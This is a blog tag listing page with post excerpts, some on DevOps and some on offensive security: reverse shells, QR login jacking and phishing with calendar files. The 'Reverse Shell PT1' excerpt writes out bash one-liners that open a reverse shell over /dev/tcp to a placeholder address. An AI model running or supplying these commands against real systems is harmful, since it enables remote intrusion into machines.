Browsing Tag
განხილვა
21 posts
Reverse Shell PT2
In a traditional client-server environment, the user is the client and the machine that provides services is the…
Reverse Shell PT1
Tools Reverse Shell Bash TCP bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196 /bin/bash -l…
The Perfect $100 System
The Pi 400 makes creating a hacking system with Raspberry Pi extremely simple – it is literally burn,…
QR Code Login Feature or Bug
Overview QRLJacking or Quick Response Code Login Jacking is a simple social engineering attack vector capable of session…
Initial Access with Evil Calendar Files
Crafting the E-Mail The first thing we need to do is craft a Social Engineering e-mail to entice…
Increasing Root Volume Size of an EBS Backed EC2
When you launch an Amazon EC2 instance, you define an Amazon EBS volume size. However, you may eventually…
Give Root Privileges to a User
The sudo command is the most powerful command in Linux. It provides a mechanism for granting administrator privileges, using administrator privileges…
Deploying a Node.js backend app to Kubernetes
Node.js is an open-source, cross-platform, back-end JavaScript runtime environment that runs on a JavaScript Engine (i.e. V8 engine) which…
DevOps Project (using Docker, Jenkins and AWS)
Prerequisites Before starting the project you should have these things in your system. Step 1 : Run Locally…
backup a database every day using Bash
This script first sets the name of the database, the username and password used to connect to the…